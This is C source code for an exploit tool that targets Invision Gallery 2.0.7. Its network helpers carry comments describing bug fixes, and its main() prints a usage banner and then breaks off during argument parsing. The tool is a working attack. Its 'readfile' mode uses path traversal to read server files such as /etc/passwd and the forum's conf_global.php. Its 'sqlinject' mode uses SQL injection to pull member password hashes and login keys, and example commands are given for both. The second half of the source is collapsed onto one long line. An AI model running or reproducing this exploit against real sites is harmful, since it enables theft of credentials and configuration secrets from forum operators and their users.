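/* Network helpers for the Invision Gallery 2.0.7 ReadFile() / SQL-injection
 * tool (see the banner printed by main()).  Everything that comes back over
 * the socket is attacker-controlled: the remote web server decides what we
 * read, so the response is bounded and NUL-terminated before any string
 * routine looks at it. */

/* Size of the HTTP response buffer.  Kept at the original value; the
 * receive loop below never writes past it. */
enum { RECV_BUF_SIZE = 10024 };

/*
 * Resolve a hostname or dotted-quad literal to an IPv4 address in network
 * byte order.
 *
 * host: NUL-terminated hostname or "a.b.c.d" string.
 *
 * Returns the address, or 0 when neither gethostbyname() nor inet_addr()
 * produces one.  0 is also INADDR_ANY ("0.0.0.0"), so that literal is
 * indistinguishable from failure; inet_addr() reports "255.255.255.255"
 * as INADDR_NONE, so the broadcast address is rejected as well.
 */
DWORD resolve(const char *host)
{
    DWORD addr = 0;
    struct hostent *he = gethostbyname(host);

    if (he == NULL) {
        /* Not a resolvable name: fall back to a numeric literal, else fail. */
        addr = inet_addr(host);
        return (addr == INADDR_NONE) ? 0 : addr;
    }

    /* The original copied h_length bytes into a 4-byte DWORD.  Only an IPv4
     * record fits; anything else is treated as unresolved instead of being
     * copied past the end of addr. */
    if (he->h_addrtype != AF_INET || he->h_length != (int)sizeof addr ||
        he->h_addr == NULL) {
        return 0;
    }
    memcpy(&addr, he->h_addr, sizeof addr);
    return addr;
}

/*
 * Send one pre-built HTTP request to port 80 on `host`, read the whole
 * response, and print the part the selected mode is after.
 *
 * sendbuffer: complete HTTP request text, built by the caller.
 * mode:       "readfile"  - print the response body verbatim;
 *             "sqlinject" - print the sixth strtok() field of the body
 *                           (separators '=', '=', '&', '&', '&', '&'), which
 *                           is where the injected column lands for the
 *                           requests main() builds -- TODO confirm against
 *                           the request builder, which is outside this listing.
 *             anything else prints an error and returns 0 (original behaviour).
 * host:       target hostname or IPv4 literal.
 *
 * Returns 0 on success, -1 when the host does not resolve, the socket or
 * connection fails, the request cannot be sent, the response has no
 * header/body separator, or the sqlinject field is missing.
 *
 * Fixes versus the original: the receive loop is bounded (it used to recv()
 * one byte at a time at strlen() offset with no limit, so a response longer
 * than the buffer overflowed the stack); the body pointer was used
 * uninitialised when no "\r\n\r\n" was present; strtok()/printf() were fed
 * NULL when a field was missing; and the socket was never closed.
 */
int Exploit(const char *sendbuffer, const char *mode, const char *host)
{
    char recvbuffer[RECV_BUF_SIZE];
    size_t total = 0;
    SOCKADDR_IN webaddr;
    SOCKET s;
    char *body;

    memset(recvbuffer, 0, sizeof recvbuffer);
    memset(&webaddr, 0, sizeof webaddr);

    webaddr.sin_family = AF_INET;
    webaddr.sin_port = htons(80);
    webaddr.sin_addr.S_un.S_addr = resolve(host);
    if (webaddr.sin_addr.S_un.S_addr == 0) {
        /* resolve() signals failure with 0; without this check the original
         * silently connected to 0.0.0.0. */
        printf("\n[-] cannot resolve host: %s\n", host);
        return -1;
    }

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == INVALID_SOCKET) {
        return -1;
    }
    if (connect(s, (struct sockaddr *)&webaddr, sizeof webaddr) != 0) {
        closesocket(s);
        return -1;
    }

    /* send() may accept fewer bytes than asked for; keep going until the
     * whole request is out or the socket fails.  The request is a small
     * caller-built string, so the size_t -> int cast cannot truncate. */
    {
        const char *p = sendbuffer;
        size_t left = strlen(sendbuffer);

        while (left > 0) {
            int sent = send(s, p, (int)left, 0);
            if (sent == SOCKET_ERROR || sent <= 0) {
                closesocket(s);
                return -1;
            }
            p += sent;
            left -= (size_t)sent;
        }
    }

    /* Read until the peer closes the connection, recv() fails, or the buffer
     * is full.  One byte is always reserved for the terminator.  An embedded
     * NUL from the server ends the usable part of the response. */
    while (total < sizeof recvbuffer - 1) {
        int got = recv(s, recvbuffer + total,
                       (int)(sizeof recvbuffer - 1 - total), 0);
        if (got <= 0) {
            break;  /* 0: orderly close; SOCKET_ERROR: use what we have */
        }
        total += (size_t)got;
    }
    recvbuffer[total] = '\0';
    closesocket(s);

    /* The body starts after the first blank line of the HTTP response. */
    body = strstr(recvbuffer, "\r\n\r\n");
    if (body == NULL) {
        printf("\n[-] no HTTP header/body separator in the response\n");
        return -1;
    }
    body += 4;

    if (strcmp(mode, "readfile") == 0) {
        printf("\n [+] Exploit Result:\n\n%s", body);
        return 0;
    }

    if (strcmp(mode, "sqlinject") == 0) {
        /* Walk to the sixth field exactly as the original chain of six
         * strtok() calls did, but stop at the first missing field instead of
         * passing NULL on to strtok() and printf(). */
        static const char *const seps[] = { "=", "=", "&", "&", "&", "&" };
        char *token = strtok(body, seps[0]);
        size_t k;

        for (k = 1; token != NULL && k < sizeof seps / sizeof seps[0]; k++) {
            token = strtok(NULL, seps[k]);
        }
        if (token == NULL) {
            printf("\n[-] could not find the injected value in the response\n");
            return -1;
        }
        printf("\n [+] Exploit Result:\n\n%s", token);
    } else {
        /* Unknown mode.  The message literal continues on the next physical
         * line of the file (the original had a raw newline inside the
         * string, which does not compile); the trailing backslash splices
         * the two halves into a single literal. */
        printf("\n[-] some error. \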
change MODE param\n"); return 0; } return 0; } int main(int argc,char * argv[]) { WSADATA wsaData; WSAStartup(MAKEWORD(2,2),&wsaData); printf("\n \n"); printf(" Invision Gallery 2.0.7 ReadFile() & SQL injection exploit \n"); printf(" (c)oded by _1nf3ct0r_ // Hell Knights Crew \n"); printf(" http://hellknights.void.ru/ \n"); printf(" Gr33tz: blackybr, 1dt.w0lf, ShadOS, ZaCo, SkvoznoY, HATS-Team \n"); printf(" \n"); if (argc == 1) { printf("\n\n [+] ReadFile():\n"); printf(" - syntax:\n"); printf(" readfile 1 <host> <pathtoindex> <localfile> \n"); printf(" readfile 2 <host> <pathtoindex> <localfile> try it 1f readfile[1] failed \n"); printf(" - params: \n"); printf(" <localfile> - path to local file ( /file), f0r example: / / / / /etc/passwd\n"); printf(" s0, 1f u want to get local path to IPB 7ry th1s: / /hellknightscrewxploit \n"); printf(" - examples:\n"); printf(" readfile 1 asd.ru index.php / / / / / /etc/passwd\n"); printf(" readfile 1 asd.ru forum/index.php / /conf_global.php\n"); printf(" readfile 1 asd.ru forum/index.php / /conf_global.php%00\n\n\n"); printf(" [+] SQL-injection:\n"); printf(" - syntax\n"); printf(" sqlinject <host> <pathtoindex> <member_id> <prefix> <column> <table>\n"); printf(" getprefix <host> <pathtoindex> get database prefix from IPB error \n"); printf(" - params:\n"); printf(" <member_id> - member's id for SQL-injection result, for example: 1\n"); printf(" <column> - ipb members' column to get. for example: ip_adress, email.\n"); printf(" <table> - ipb table to use. f0r example: member\n"); printf(" <prefix> - database prefix. 
\n"); printf(" - examples:\n"); printf(" ig.exe sqlinject asd.ru index.php legacy_password ibf_ members 1 \n"); printf(" ig.exe sqlinject asd.ru index.php member_login_key ibf_ members 1\n"); printf(" ig.exe sqlinject asd.ru forum/index.php ip_adress ibf_ member 5\n\n"); return 1; } char * mode = argv[1]; // readfile() exploit // if (strcmp(mode,"readfile")==0) { char * type = argv[2]; char * path = NULL; path = argv[4];